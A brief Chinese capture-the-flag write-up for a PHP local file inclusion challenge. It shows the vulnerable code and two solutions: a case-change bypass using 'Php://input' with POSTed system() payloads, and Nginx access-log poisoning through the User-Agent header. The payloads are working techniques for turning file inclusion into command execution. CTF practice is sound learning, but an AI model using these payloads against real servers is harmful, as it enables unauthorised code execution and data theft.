信息收集
过滤了php
和data
php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
解题
大小写绕过
data不知道为什么不成功,有知道的大佬也可以在评论区教我一手
s
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>
hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过
php
?file=/var/log/nginx/access.log
user-agent里写上
php
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>
